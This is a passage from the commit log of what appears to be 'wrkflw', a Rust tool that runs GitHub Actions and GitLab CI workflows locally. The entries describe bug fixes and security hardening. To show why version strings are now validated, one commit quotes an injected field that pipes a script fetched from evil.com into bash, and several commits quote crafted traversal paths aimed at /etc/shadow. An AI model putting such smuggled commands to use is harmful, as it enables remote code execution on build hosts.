crates compile without the tui feature, not just the default workspace member. The previous version would happily miss breakage in any non-default crate.	2026-04-02 14:51:59 +05:30
Gokul	ebabe6414a	feat(validate): cross-check local composite action required inputs (#78 ) * feat(validate): cross-check local composite action required inputs The validate command was happily declaring workflows "valid" even when they used a local composite action without providing its required inputs. The workflow would then blow up at runtime, which is exactly the kind of thing a validator should catch. The problem was that validate_action_reference() only checked whether the local action path existed on disk. It never bothered to read the action.yml, look at the inputs section, or verify that required inputs were actually provided in the step's `with:` block. So it was doing about half its job. Thread the repo root path through the validator call chain (evaluate_workflow_file → validate_jobs → validate_steps → validate_action_reference) so we can resolve local action paths. Then read and parse the action.yml, extract inputs with `required: true` and no default, and flag any that are missing from the step's `with:` params. Case-insensitive matching because that's what GitHub Actions does. Graceful degradation: if we can't find the repo root or the action file is unreadable, we silently skip rather than blowing up. 10 new unit tests cover the various cases. Closes #67 * fix(validate): handle string `required` and drop unsafe cwd fallback Two bugs in the local action input validation that just landed: First, `find_repo_root` was falling back to `current_dir()` when no `.git` directory was found. This is wrong — if you're validating a workflow outside a git repo, the cwd could be literally anywhere, and you'd end up resolving local action paths against some random directory. Return `None` and skip the check instead. Second, `required: 'true'` (as a YAML string) was silently treated as not required, because we only checked `as_bool()`. GitHub Actions treats the string "true" as truthy, so we should too. Add case-insensitive string matching alongside the bool check. While at it, add a test for the string `required` case so we don't regress on this.	2026-04-02 13:49:47 +05:30
Gokul	452044f9d2	feat(cli): add --job flag to run a specific job and --jobs to list them (#77 ) * feat(cli): add --job flag to run a specific job and --jobs to list them Until now, wrkflw only operated at the workflow level. You could run an entire workflow or list workflow files, but if you wanted to debug a single failing job you had to sit through every other job first. This is not great. Add `--job <name>` to `wrkflw run` so you can execute exactly one job in isolation, skipping dependency resolution entirely. Add `--jobs` to `wrkflw list` so you can actually see what jobs are available before running them. Both work for GitHub workflows and GitLab pipelines. The filtering happens after dependency resolution — we just replace the execution plan with a single-job batch. If the job name doesn't exist, we tell you what's available instead of silently doing nothing. The TUI still runs full workflows; job selection there is a separate concern. Closes #68 * fix(executor): include transitive deps when running a single job The --job flag was replacing the entire execution plan with just the target job, silently dropping all its dependencies. So if you ran --job deploy and deploy needs build which needs setup, you'd get deploy running alone with none of its prerequisites. Confusion ensues. Extract the duplicated inline filtering (copy-pasted verbatim across both the GitHub and GitLab execution paths) into a shared filter_plan_to_job() helper in dependency.rs. The new logic walks the needs graph via BFS to collect transitive deps, then prunes the existing topologically-sorted plan to only include relevant jobs while preserving batch ordering. Add 9 unit tests covering the dependency collection and plan filtering — linear chains, diamond graphs, partial subgraph isolation, error paths, and empty batch removal. * fix(executor): use stage-aware filtering for GitLab --job flag It turns out that filter_plan_to_job walks `needs` edges to find transitive dependencies, which works fine for GitHub workflows. But GitLab pipelines use stage ordering for implicit dependencies, and convert_to_workflow_format sets `needs: None` on every converted job. So running `--job deploy` on a GitLab pipeline would silently drop all build and test jobs. Not great. Add filter_plan_to_job_by_stage that understands the GitLab model: keep all jobs in earlier stage batches (they're implicit deps) and filter only the target's own batch down to just the target job. The GitHub workflow path continues using the needs-based filter. While at it, extract the job-not-found error into a shared helper and add proper test coverage: 6 unit tests for the stage-aware filter plus 3 integration tests exercising the full execute_workflow path with target_job set.	2026-04-02 13:22:58 +05:30
Gokul	781bd42b21	fix(docker): persist setup action images across job steps (#76 ) * fix(docker): persist setup action images across job steps Reported in #60. When a workflow uses actions like setup-node or setup-php, the Docker image resolved for that action (e.g. node:20-slim, composer:latest) was only used for the action step itself. Every subsequent `run:` step would blissfully fall back to ubuntu:latest, which of course has neither node nor composer. Confusion ensues. It turns out that `execute_job()` computes `runner_image_value` exactly once via `get_effective_runner_image()` and never updates it. The action step gets its own image from `prepare_action()`, but that image is completely ignored for subsequent `run:` steps. So your setup-node configures... nothing, as far as run steps care. Fix this by pre-scanning all job steps for known setup actions before the step loop begins. Single setup action? Use its image. Multiple setup actions (e.g. Laravel's PHP + Node.js combo)? Build a combined Dockerfile that installs all required runtimes on the ubuntu base. No setup actions? Nothing changes — fully backward compatible. While at it, skip the pointless pull attempt for locally-built wrkflw-* images (they only exist locally, the 404 from Docker Hub was just noise), and bump the build_image timeout from 2 minutes to 10 — because installing PHP from a PPA inside a Docker build is not a speed demon. Closes #60 * fix(docker): harden setup action runtime detection against injection and waste The setup action detection code was interpolating user-controlled version strings straight into Dockerfile RUN directives with zero validation. So a workflow with node-version: "20; curl evil.com \| bash" would happily inject arbitrary commands into the build. This is not great. It also used starts_with() for action name matching, which would match actions/setup-node-legacy or anything else that happened to share the prefix. And every single build generated a UUID-tagged image that was never cleaned up, so you'd accumulate orphaned wrkflw-combined:* images until your disk had opinions about it. While at it, the 2-minute to 10-minute timeout bump was applied to all image builds, not just the combined runtime ones that actually need it. And the Go install script hardcoded linux-amd64, which is the kind of thing that works right up until someone runs on ARM. Let's fix all of it: - Validate version strings against [a-zA-Z0-9._-] before use - Use exact equality for action repo matching, not prefix matching - Use deterministic content-based image tags so identical runtime combinations reuse cached images - Deduplicate same-language setup steps (last one wins) - Scope the 10-minute timeout to wrkflw-combined:* builds only - Detect container architecture for Go installs - Add tests for all of the above * fix(docker): fix three correctness bugs in setup action image resolution The previous commit introduced setup action detection, but it had a few problems that would bite people in practice. First, the single-runtime path was returning bare images like node:20-slim or python:3.12-slim directly. These images don't have git installed, which means actions/checkout — typically the first step in any workflow — would just fail. Not great. Fix: always build a combined image on top of the runner base (catthehacker/ubuntu:act-latest) even for single-runtime jobs, so git and friends remain available. The SetupRuntime.image field is now dead code, so remove it entirely. Second, the Python install script was cheerfully ignoring the requested version and installing whatever python3 the distro ships. Ask for 3.12, get 3.10. Surprise. Fix: use the deadsnakes PPA to install the specific version requested. Third, PodmanRuntime had no skip-pull guard for locally-built wrkflw-* images, so podman would attempt to pull wrkflw-combined:* from a registry. Add --pull=never for wrkflw-* prefixed images. * refactor(docker): unify setup action registry and fix remaining review issues The previous commits introduced setup action detection, but left a few things in a state that would annoy anyone who looked closely. First, determine_action_image() was still using starts_with() for action matching — the exact same bug that detect_setup_runtimes had already fixed. So "actions/setup-node-legacy" would happily match as a Node.js setup action. Not great. Second, dtolnay/rust-toolchain conventionally encodes the toolchain in the @ref (e.g., @nightly, @1.75.0), not in a with.toolchain key. The old code would silently default to "stable" for anyone using the idiomatic form. Surprise. Third, the repetitive if/else chain in detect_setup_runtimes (seven near-identical blocks) and the parallel match in determine_action_image were two independent copies of the same knowledge, with no compile-time guarantee they'd stay in sync. Adding a new setup action meant editing two places and hoping you remembered both. Fix all of it: - Introduce a single SETUP_ACTIONS const table that both functions consume, eliminating the drift risk entirely - Add version_from_ref support so dtolnay/rust-toolchain@nightly actually produces "nightly" instead of "stable" - Extract generate_combined_dockerfile() and combined_image_tag() as pure testable functions - Merge all install scripts into a single RUN layer instead of N separate apt-get update calls - Include a content hash in image tags so install script changes invalidate cached images even when language/version pairs are the same - Add 15 tests covering all the above * fix(docker): add image caching, stable hashing, and shared constants The combined runtime image code had three problems that were all independently annoying but together made for a lovely trifecta of "why is this slow and also fragile." First, build_combined_runtime_image was always rebuilding the Docker image, even when a perfectly good one already existed locally. That means every single job run was creating temp dirs, writing Dockerfiles, tarring contexts, and shipping them to the daemon. For absolutely no reason. Second, the image tag hash used DefaultHasher, which Rust's own docs explicitly say is not stable across versions. So upgrading your Rust toolchain silently invalidates every cached image. Not great when caching is the whole point. Third, the "wrkflw-" and "wrkflw-combined:" prefixes were hardcoded as magic strings in three separate files. Change one, forget the others, and you get to debug why podman is trying to pull a locally-built image from Docker Hub. The fix: add image_exists() to ContainerRuntime so we can skip redundant builds, replace DefaultHasher with FNV-1a for stable cross-version hashing, and extract the prefixes into shared constants. While at it, merge the duplicate apt-get update calls in the generated Dockerfile into a single RUN layer. * fix(docker): fix version_from_ref with SHA pins and normalize .x suffixes The version_from_ref logic for dtolnay/rust-toolchain was happily treating a pinned git SHA (the 40-char hex kind) as a toolchain name. So `dtolnay/rust-toolchain@d4ff7a3c5...` would try to install Rust toolchain "d4ff7a3c5...", which rustup finds deeply confusing. Filter out bare SHAs with the existing is_git_sha() check and fall back to the default version instead. While at it, the ".x" suffix that's idiomatic for Node versions (e.g., "16.x") was leaking through to install scripts for every language. Python would try to apt-get install python16.x, which is not a real package and never will be. Normalize the suffix away at extraction time rather than making each install script deal with it independently. Add tests for both cases.	2026-04-02 12:34:40 +05:30
Gokul	fd348a460e	fix: actually execute Docker-based GitHub Actions instead of emulating them (#74 ) * fix(executor): actually execute Docker-based GitHub Actions instead of emulating them Third-party GitHub Actions that use Docker (like super-linter) were silently passing without ever actually running. The engine would resolve the action, pick a Docker image, and then... run `echo 'Would execute GitHub action: ...'` inside it. Every single time. Regardless of runtime mode. Confusion ensues. It turns out there were two separate failures conspiring here: 1. `prepare_action()` would error out on `ActionType::DockerBuild` with "not yet supported", fall back to `determine_action_image()`, and cheerfully return `node:20-slim` for super-linter. This is not great. 2. The `PreparedAction::Image` execution branch had three sub-paths for is_docker, is_local, and everything else — and all three just ran echo commands. The image was resolved correctly and then completely ignored. The fix has several parts: - Add a `NativeDocker` variant to `PreparedAction` that means "run this image with its built-in ENTRYPOINT, no command override." Docker registry actions and DockerBuild actions both use this. - Implement DockerBuild properly: clone the repo, resolve the Dockerfile path from action.yml, build it, return the tag. Uses the existing `shallow_clone` and `runtime.build_image`. - Fix `build_image_inner` to tar the full context directory instead of just the Dockerfile. The old code had `_context_dir` sitting right there, computed and unused. COPY instructions in Dockerfiles need the context, obviously. - Allow empty `cmd` in `run_container` to mean "use the image's default ENTRYPOINT/CMD". The Docker impl now sets `config.cmd = None` when cmd is empty. Podman already handled this correctly. The existing `PreparedAction::Image` path with all its special-cased action handling (actions-rs, checkout, etc.) is completely untouched. Closes #59 * fix(executor): fix macOS entrypoint hang, path traversal, and silent emulation pass Three bugs in the Docker action execution path from the previous commit: 1. The macOS emulation entrypoint override (`bash -l -c`) was applied unconditionally, even when cmd was empty (NativeDocker path). That means Docker actions running on macOS emu images would get bash with no argument — which either hangs forever or exits immediately. The image's real ENTRYPOINT gets discarded either way. This is not great. Fix: capture `has_cmd` before cmd_vec is moved into the config, only apply the bash wrapper when there's actually a command to wrap. 2. The `dockerfile_rel` extracted from action.yml's `runs.image` was not sanitized after stripping the `docker://` prefix. A malicious action.yml with `docker:///etc/shadow` or `../../sensitive` would escape the action directory via Path::join's absolute-path behavior or dotdot traversal. Fix: strip leading slashes and reject any path containing `..`. 3. Emulation mode returned exit_code 0 for Docker actions it didn't actually run. Users got a green checkmark for actions that were silently skipped. Confusion ensues. Fix: return exit_code 1 with a clear stderr message explaining the action was not executed and needs --runtime docker. While at it, add tests for all three fixes: NativeDocker variant construction, dockerfile path sanitization (6 cases), and emulation empty-cmd failure behavior. * fix(executor): harden Docker action security and fix docker:// execution path Three issues found during review, all in the Docker action plumbing: 1. The `is_docker` path in `prepare_action()` was returning `PreparedAction::Image` instead of `NativeDocker`, which means `docker://` prefixed actions in `uses:` went straight through the legacy echo-command path and never actually executed. Same class of bug we just fixed for DockerBuild, hiding in plain sight. 2. The path traversal check for Dockerfile paths used `contains("..")`, which rejects perfectly legitimate directory names like `foo..bar/`. Check for `..` as an actual path component instead via `split('/').any(\|c\| c == "..")`. 3. `build_image_inner` was calling `append_dir_all` on untrusted action repositories without disabling symlink following. A malicious action repo could plant a symlink pointing at the host filesystem and have its contents shipped into the Docker build context. That's the kind of thing that makes security auditors lose sleep. Set `follow_symlinks(false)` on the tar builder. * fix(executor): wire up runs.entrypoint, runs.args, and fix local Docker dispatch The previous commits got the NativeDocker path working for remote actions, but left several holes that a code review correctly identified. Let's fix them all. First, local Docker actions (uses: ./my-action with a Dockerfile) were still returning PreparedAction::Image instead of NativeDocker. Same class of bug we just fixed for remote actions, hiding one function call away. They now go through NativeDocker and parse the local action.yml for entrypoint/args. Second, runs.entrypoint and runs.args from action.yml were being completely ignored. Docker actions that declare their entrypoint in action.yml (which is, you know, a lot of them) would silently use the wrong entrypoint. Add an entrypoint parameter to the ContainerRuntime trait and thread it through all four implementations: Docker sets Config.entrypoint, Podman passes --entrypoint, and the emulation runtimes accept-and-ignore it. Third, with.args from workflow steps (uses: docker://alpine with args: "echo hello") was not being passed as container CMD. It now overrides runs.args when present, matching GitHub Actions behavior. While at it: - Extract sanitize_dockerfile_rel into a real function instead of having the tests duplicate the logic and test their own copy. Testing a copy of your code instead of the actual code is not what I'd call confidence-inspiring. - Add canonicalize() defense-in-depth after Dockerfile path resolution to catch symlink escapes. - Document the build_image_inner context directory invariant. * fix(executor): fix broken args parsing, empty dockerfile path, and silent entrypoint drop Three correctness bugs found during review of the Docker action execution path: 1. with.args was being split on whitespace like a caveman. An argument like "hello world" would turn into two separate args, which is not how GitHub Actions works. Use shlex::split() for proper shell-word parsing, with a whitespace fallback for malformed input that shlex chokes on. 2. sanitize_dockerfile_rel() happily accepted empty strings. Feed it "" or "docker://" and it would produce an empty path, which then joins to a directory instead of a file. The subsequent docker build would fail with a confusing error. Let's just reject empty paths upfront. 3. SecureEmulationRuntime silently swallowed the entrypoint override without telling anyone. If you're running in secure emulation mode and your action specifies runs.entrypoint, you deserve to know it's being ignored — not left wondering why your action isn't doing what you expect. * fix(executor)!: pass explicit build context to Docker image builds It turns out that build_image_inner was deriving the Docker build context from dockerfile.parent(), which is wrong when the Dockerfile lives in a subdirectory of the action root. An action with runs.image: subdir/Dockerfile would get subdir/ as its build context instead of the action root, silently breaking every COPY instruction that references files outside that subdirectory. The fix is straightforward: add an explicit context_dir parameter to the ContainerRuntime::build_image trait so callers tell us what the context is instead of us guessing from the Dockerfile path. The DockerBuild path in engine.rs now passes &action_dir, and the Docker inner implementation computes the Dockerfile path relative to context_dir via strip_prefix instead of just using file_name(). While at it, add a warning log when shlex::split fails to parse with.args (unmatched quotes). Previously this silently fell back to naive whitespace splitting, which is the kind of thing that makes you stare at container logs for an hour wondering why your quoted argument got split into three pieces. * fix(executor): reject bad dockerfile paths instead of silently guessing Three bugs found during review: The build_image_inner strip_prefix fallback was silently using just the filename when the Dockerfile wasn't a clean descendant of the context directory. So if something weird happened with the path, you'd just get the wrong Dockerfile used for the build with zero indication anything went wrong. That's not a fallback, that's a footgun. Return an error instead. sanitize_dockerfile_rel was happily preserving a leading "./" from the raw path, which then caused strip_prefix to fail (because "./build/Dockerfile" is not a prefix-match for a joined path). Strip it early so the downstream path arithmetic actually works. While at it, extract_docker_runs_config was using filter_map on runs.args, which means non-string YAML values like integers and booleans were silently dropped. GitHub Actions coerces those to strings, so we should too. * fix(executor): handle string-form args and reject malformed with.args It turns out that extract_docker_runs_config only handled runs.args as a YAML sequence. If an action.yml declared args as a plain string (which GitHub Actions absolutely allows), we'd silently drop the entire argument. Not great. While at it, the with.args parser had the opposite problem — when shlex::split hit an unmatched quote, it shrugged and fell back to naive whitespace splitting. That's the kind of "graceful degradation" that produces subtly wrong container invocations and makes you spend an afternoon wondering why your action is getting the wrong flags. Fix both: extract_docker_runs_config now handles args as either a YAML sequence or a string (shell-tokenized via shlex). The with.args path now returns a hard error on malformed quoting instead of pretending everything is fine. Added tests for string-form args including the bad-quoting edge case. * fix(executor): close sub_path traversal hole and make args parsing consistent It turns out that sub_path from action references (the part after owner/repo in owner/repo/some/subdir) was being joined to the clone directory with absolutely no sanitization. A crafted sub_path like "../../etc" would escape the cloned repo and get passed as the Docker build context. Please don't do that. Add sanitize_sub_path() that rejects any path component equal to "..", and apply it in both the DockerBuild and Composite action paths. For DockerBuild, also canonicalize the resolved action_dir and verify it's still inside the repo_dir — because symlinks exist and trusting user-controlled paths is how we end up on HN. While at it, fix a behavioral inconsistency in args parsing: bad quoting in action.yml's runs.args was silently falling back to the raw string, while the exact same bad quoting in a workflow's with.args was a hard error. Now both are errors, because silently doing the wrong thing is worse than loudly refusing. * fix(executor): harden Docker build context, sanitize inputs, deduplicate mount setup The PR review flagged several issues ranging from correctness to performance to plain old code smell. Let's address them all. It turns out that build_image_inner was happily tarring the entire context directory and shipping it to the Docker daemon, cheerfully ignoring any .dockerignore file. For large action repos with test fixtures, docs, and who knows what else, this is not great. When a .dockerignore exists, we now use the `ignore` crate's WalkBuilder to walk only non-ignored files. Falls back to the old append_dir_all when there's no .dockerignore, because we're not breaking anything that already works. The sanitize_sub_path and sanitize_dockerfile_rel functions checked for ".." traversal but not null bytes, which can cause truncation at OS boundaries and potentially bypass the traversal check. Please don't do that. Added null byte rejection to both. extract_docker_runs_config was taking &Option<T> instead of Option<&T>, which is the Rust equivalent of wearing your shirt inside out — it works, but everyone who sees it knows something is wrong. Fixed the signature and all callers. The with.args empty-string handling was also wrong: `with.args: ""` was treated as "no override" instead of "pass zero args", which doesn't match GitHub Actions behavior where the presence of the key is the signal, not its value. While at it, extracted the volume/env/mount setup boilerplate that was copy-pasted across three execution paths into a StepContainerContext helper. Not because I enjoy moving code around, but because the same 12 lines in three places is not my idea of maintainability. * fix(executor): cap build context size, disable git hooks, add NativeDocker tests Three security and reliability fixes from the PR review: The build_image_inner tar buffer was completely unbounded — a malicious or just absurdly large action repo with no .dockerignore would happily try to load the entire thing into memory. Now we track cumulative file sizes and bail at 500 MB. The old append_dir_all fallback had to go since it gives us no per-file hook; replaced it with an ignore::WalkBuilder walk (already a dep) so both paths enforce the same limit. shallow_clone was happily running git checkout on untrusted repos without disabling hooks. A cloned repo's .git/hooks/post-checkout runs automatically, which is the kind of thing that makes security reviewers lose sleep. Pass -c core.hooksPath=/dev/null to every git invocation so cloned repos can't execute anything on our host. While at it, add a MockContainerRuntime and four integration tests that exercise the NativeDocker execute_step path end-to-end: entrypoint passthrough, with.args override + INPUT_* injection, empty args, and step/job env propagation. This path previously had zero test coverage for the runtime flow. * fix(executor): deduplicate build context walker, harden sub_path, add missing tests The build_image_inner code in docker.rs had two near-identical ~50-line walker loops — one for when .dockerignore exists and one for when it doesn't. The only difference was a single add_custom_ignore_filename() call on the builder. Copy-paste like that drifts. Let's not. Merged into a single loop with a conditional on the WalkBuilder before iteration. Same behavior, half the code. While at it, sanitize_sub_path now splits on both '/' and '\' so a Windows-style traversal like "a\..\..\etc" doesn't sneak past the check. Also expanded the PreparedAction::Image doc comment to explain which code paths still produce it and why it's distinct from NativeDocker — future contributors shouldn't have to guess. Added tests for: unmatched-quote error path in with.args, with.args overriding runs.args, and backslash path traversal in sub_path. * fix(executor): close backslash traversal gap and add with.entrypoint override It turns out that sanitize_dockerfile_rel was only splitting on '/' to catch ".." traversal, while its sibling sanitize_sub_path was correctly splitting on both '/' and '\\'. So a crafted Dockerfile path like "..\\..\\etc\\shadow" would sail right past the sanitizer. The canonicalize() defense-in-depth below would catch this in practice, but relying on one security layer to cover a hole in another is not great. Let's just make them consistent. While at it, the NativeDocker execution path was missing support for with.entrypoint — a documented GitHub Actions feature that lets workflow steps override the Docker container's ENTRYPOINT. We were already handling with.args but silently ignoring with.entrypoint, which is the kind of asymmetry that bites you the moment someone actually tries to use it. * fix(executor): close composite sub_path symlink hole and filter empty entrypoint The DockerBuild handler had a proper canonicalize + starts_with defense-in-depth check after resolving sub_path, but the composite action handler just blindly trusted sanitize_sub_path() and called repo_dir.join(p) without verifying the result stayed inside the cloned repo. A symlink named "legit" pointing to "../../secrets" would sail right through the string-only sanitizer. That is not great. Add the same canonicalize + starts_with check to the composite action path so both handlers have identical protection. While at it, filter empty-string entrypoint values to None in both extract_docker_runs_config and the Docker runtime layer. An empty runs.entrypoint in action.yml should mean "use the image default", not "tell Docker to clear the entrypoint" — which is what passing Some("") actually does. Added tests for both the with.entrypoint override path and the empty entrypoint filtering. * fix(executor): filter empty podman entrypoint and extract NativeDocker step handler The podman runtime was happily passing `--entrypoint ""` to podman when a workflow set `with.entrypoint: ""`, while Docker correctly filtered it out via `.filter(\|s\| !s.is_empty())`. So the two runtimes silently diverged on empty entrypoint behavior. Not great. Add the same filter to podman's entrypoint handling so both runtimes treat empty strings as "use the image default." While at it, extract the ~90-line NativeDocker match arm from execute_step into its own `execute_native_docker_step` function. That match block was getting unwieldy, and this keeps each action type's execution logic self-contained. Also drop a TODO on the in-memory tar buffer in build_image_inner — it holds the entire build context in a Vec<u8>, which gets uncomfortable as repos approach the 500 MB cap.	2026-04-02 10:28:37 +05:30
Gokul	8a8d7e5eec	fix: resolve correctness, security, and parsing bugs across codebase (#73 ) * fix: resolve 10 bugs found during full codebase review - Fix memory leak from Box::leak() in status bar render loop - Fix AES-GCM nonce reuse vulnerability in encrypted secret storage - Fix Default impl for EncryptedSecretStore that discarded encryption key - Fix early return in list command that prevented GitLab pipeline listing - Fix double validation call in validate_github_workflow - Wire --show-action-messages CLI flag through ExecutionConfig - Add serde(rename = "if") to GitLab Rule if_ field for correct deserialization - Fix potential panic on multibyte paths in workflow tab path shortening - Include involved job names in circular dependency error messages - Improve cron syntax validation to check value ranges, steps, and expressions * fix: address PR review feedback - Remove dead `_nonce` parameter from `EncryptedSecretStore::from_data` - Add clarifying comment for inverted show/hide action messages mapping - Add comprehensive cron validation tests (valid expressions, out-of-range values, wrong part count, invalid steps, invalid ranges, edge cases) * fix: resolve 27 bugs found during full codebase verification A thorough manual verification of every feature uncovered a remarkable collection of bugs hiding in plain sight. The highlights: The `strategy.matrix` YAML structure was never parsed. The Job struct had `matrix` at the top level, but GitHub Actions nests it under `strategy.matrix`. Serde silently ignored the `strategy` key, so matrix expansion code existed but could never run. For absolutely no reason. Introduce a proper `Strategy` struct and wire it through the executor. The Step struct was missing `if`, `id`, `working-directory`, `shell`, and `timeout-minutes` fields. Step-level conditionals were silently dropped — every step always ran regardless of its `if` condition. While at it, `continue-on-error` was in the struct but had no serde rename and was never checked during execution. Fix all of that. The validator cheerfully reported cyclic `needs` dependencies as "Valid". Add DFS cycle detection so `A -> B -> C -> A` is caught at validation time instead of blowing up at execution time. Five of eight GitLab CI test fixtures failed to parse because the model was too rigid: `extends` only accepted arrays (not strings), `variables` rejected integers, `cache.key` rejected structured formats, and `script` rejected single strings. Add custom deserializers following the existing codebase pattern. The GitHub trigger function leaked the auth token via curl process arguments visible in `/proc/[pid]/cmdline`. Replace with reqwest, matching the pattern already used elsewhere. Also add symlink and path traversal protections in the executor. Other fixes: hardcoded matrix variable stripping replaced with proper substitution, `show_action_messages` wired through TUI, dead `if true {}` removed, default branch detection uses remote HEAD instead of current branch, cron validator accepts named days/months, reusable workflow ref validation loosened from OR to AND, matrix include entries merge into all matching combos. * fix: harden step-level evaluation, volume checks, and add tests The PR review turned up a few things that needed fixing before this was actually ready. The step-level `if` condition evaluator was silently reusing the job-level `evaluate_job_condition` function, which knows nothing about step-scoped expressions like `steps.<id>.outcome`, `success()`, `failure()`, `always()`, or `cancelled()`. These would fall through to the generic "unknown condition" path without so much as a warning. Now they're detected early, a warning is logged, and they default to true — which is at least honest about the limitation. The volume path traversal check (`..`) was applied to the entire volume spec string, meaning a perfectly legitimate container path like `/safe/host:/container/..weird` would get rejected. The check now only inspects the host path component after splitting on `:`, which is the part that actually matters for traversal attacks. While at it, renamed the awkwardly-named `step_name_for_skip` to just `step_name` in `execute_matrix_job` for consistency with `execute_job`, and added a BREAKING_CHANGES.md documenting the EncryptedSecretStore serialization format change. Added 19 new tests covering matrix include/exclude merge semantics, step condition evaluation for unsupported expressions, volume path traversal edge cases, and continue-on-error + step-level if parsing. * fix: correct condition defaults, path traversal check, and null variable handling The previous commit defaulted all unsupported step-level condition functions (failure(), cancelled(), always(), success()) to true. It turns out that defaulting failure() and cancelled() to true is semantically wrong — it means steps guarded by `if: failure()` will always run, even when nothing failed. That's not a feature, that's a bug. Default each function to its most likely state: always() and success() return true, failure() and cancelled() return false. Not perfect (we still can't track actual step outcomes), but at least we're not silently running cleanup steps on every build. The path traversal check was using `contains("..")` which is a substring match. A directory literally named `..hidden` would get rejected. Use Path::components() to detect actual ParentDir components instead of playing string matching games. While at it, fix deserialize_variables in the GitLab models to handle YAML null values as empty strings instead of producing "~\n". Also trim the catch-all serialization output. * fix: correct cycle detection, condition evaluation, and matrix continue-on-error The DFS cycle detector in `dfs_detect_cycle` had a genuinely nasty bug: when a cycle was found, it returned early without popping itself from rec_stack. This left stale entries that corrupted the stack for subsequent DFS traversals. Net result: cross-edges to already-visited nodes would be falsely reported as cycles. A→B→A is a cycle, but D→E→A is just a cross-edge. The old code couldn't tell the difference. Fix this properly by introducing a separate `in_stack` HashSet for O(1) membership checks, while keeping the Vec for path reconstruction. Both are now correctly cleaned up — no early returns skip the cleanup. While at it, `execute_matrix_job` was silently ignoring `continue-on-error` on the Err branch. The non-matrix `execute_job` handled it correctly, but the matrix path would just abort the entire job. Copy-paste bugs are fun like that. Let's fix that. The `evaluate_job_condition` status function handling was doing sequential `contains()` checks with early returns, which meant compound expressions like `failure() \|\| success()` would match `failure()` first and return false. Now we scan for all status functions in one pass and pick the most permissive default when positive functions are present. Also: `convert_yaml_to_step` was hardcoding `None` for `if_condition`, `id`, `working_directory`, `shell`, and `timeout_minutes` despite the YAML potentially having them. And `is_valid_cron_atom` was rejecting valid POSIX cron syntax like `5/2`. * refactor(executor): extract step guards into shared helper, fix steps.* default The step-level if-condition check and continue-on-error handling was copy-pasted between execute_job and execute_matrix_job with subtly different control flow — one sets job_success=false and breaks, the other returns Ok(JobResult{Failure}) immediately. Two copies of the same logic that already disagree is not redundancy, it's a bug waiting to happen. Let's fix that. Extract run_step_with_guards() that encapsulates the if-condition evaluation, execute_step call, and continue-on-error wrapping into a single StepOutcome enum. Both job execution paths now call this shared helper. While at it, fix the condition evaluator defaulting bare steps.* references to true — "steps.build.outcome == 'failure'" should not optimistically run the step. Now only always() and success() default to true; everything else (bare step refs, failure(), cancelled()) conservatively defaults to false. Also add serde alias "matrix" on Job.strategy so old workflows with flat matrix: at job level still parse, and document the intentional or_insert_with in matrix include merging per GitHub Actions spec. * fix: clean up review findings in step guards, secret store, and test fixture The PR review flagged three issues worth fixing before merge. First, run_step_with_guards had a bogus StepStatus::Skipped check in the abort_job logic. The condition tested for Failure or Skipped, then only actually aborted on Failure — meaning the Skipped branch did nothing except confuse anyone reading the code. Simplify to just check Failure directly. Second, EncryptedSecretStore::from_json would silently fail with a generic serde error when fed the old serialization format (which had a shared top-level nonce field). Now it detects the old format by checking for the "nonce" key and returns a clear error pointing at BREAKING_CHANGES.md. Added a test for this. Third, tests/workflows/continue-on-error-test.yml was an orphan fixture — nothing referenced it. The same content is already tested inline by parse_continue_on_error_workflow in the parser. Removed it. * fix: correct cron day-of-week range, steps. false positive, and Step boilerplate Three issues from PR review, all straightforward: The cron validator was rejecting day-of-week value 7, which is a perfectly valid Sunday alias in both POSIX cron and GitHub Actions. The max was 6 when it should be 7. The named-value resolver guard also needed updating from `max == 6` to `max >= 6` so named days still resolve correctly with the wider range. The `evaluate_job_condition` heuristic for detecting `steps.` references was using a bare `contains("steps.")`, which means an env var like `env.MY_STEPS_COUNT` would falsely trigger it and short-circuit to false. Now we check that the character before "steps." is either start-of-string or non-alphanumeric. Not a full expression parser, but it stops the obvious false positives. While at it, add a `Step::with_run` constructor so the GitLab converter doesn't need three identical 12-field struct literals that silently break every time someone adds a field to Step. fix: harden steps. boundary check, document condition semantics, dedup cycles The steps. word-boundary heuristic in evaluate_job_condition was checking for alphanumeric characters before "steps." to avoid false positives on env vars like "env.MY_STEPS_COUNT". It turns out that underscore is not alphanumeric, so "env._STEPS_CHECK" would incorrectly trigger the step-reference path and return false. While at it, the always() && failure() compound expression returning true got a proper comment explaining why that's intentional — we lack step-status context locally, so we'd rather over-run than silently skip steps. Not ideal, but honest. The DFS cycle detector in detect_cyclic_needs could report the same cycle multiple times depending on HashMap iteration order. Normalize cycles by rotating the node list to start at the lexicographically smallest node, then deduplicate via a HashSet. Same cycle from different entry points now gets reported exactly once. * fix: squash review nits — double parse, clippy warnings, lost flag Three leftover issues from the codebase review PR: The from_json() deserialization was parsing the JSON twice — once into serde_json::Value to sniff for the old nonce field, then again from the raw string into the actual struct. Parse once, use from_value() on the already-parsed Value. Not rocket science. The cycle detector had two clippy warnings: .iter().cloned().collect() on a slice (just use .to_vec(), please) and .min_by_key() cloning a double reference instead of comparing properly. Switch to .min_by() with an explicit cmp. The show_action_messages flag was being silently dropped in execute_workflow_cli — hardcoded to false regardless of what the user asked for. Propagate it through the function signature and the TUI fallback path so it actually does something.	2026-04-01 23:06:48 +05:30
bahdotsh	b49276a026	fix: stop hard-exiting on unreadable directory and add #[must_use] to ContainerOutput The validate subcommand was calling std::process::exit(1) when a directory couldn't be read, which is a rather aggressive response to a permission error. Especially when the code four lines above handles a missing path by setting validation_failed and moving on to the next one. Consistency is nice. Let's have some. Split the match from the method chain (because continue is a statement, not an expression, and Rust has opinions about that) and replaced the exit(1) with the same continue pattern. While at it, slap #[must_use] on ContainerOutput so the compiler will yell at anyone who discards a run_container result without checking exit_code. All current callers already bind it, so this is purely forward-looking — but the kind of bug it prevents is the silent-misexecution kind, and those are nobody's favorite.	2026-04-01 19:28:15 +05:30
bahdotsh	422a035c40	test: add tests for review fixes and clean up dead code The previous commit fixed a bunch of bugs but left a few loose ends. The next_job() function still had a redundant bounds check that previous_job() already had cleaned up — the .filter() call makes the inner `if workflow_idx >= self.workflows.len()` dead code. Let's not leave half-finished refactors lying around. While at it, add tests for the three behavioral changes that really should have had tests from the start: emulation runtime returning Ok on non-zero exit codes, log processor not panicking on multi-byte UTF-8 near bracket boundaries, and step validator correctly rejecting steps with only a name field. Also fix formatting (cargo fmt) and a clippy warning about items defined after the test module.	2026-04-01 19:08:44 +05:30
